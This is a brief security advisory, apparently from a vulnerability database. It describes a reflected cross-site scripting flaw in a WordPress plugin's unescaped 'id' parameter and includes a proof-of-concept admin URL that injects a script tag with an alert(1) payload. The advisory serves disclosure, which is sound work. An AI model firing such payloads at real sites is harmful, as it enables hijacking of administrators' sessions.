Description The plugin does not sanitize or escape the ‘id’ parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting vulnerability.
wp-admin/options-general.php?page=fatt-24-tax&id=12<script>alert(1)%3B<%2Fscript>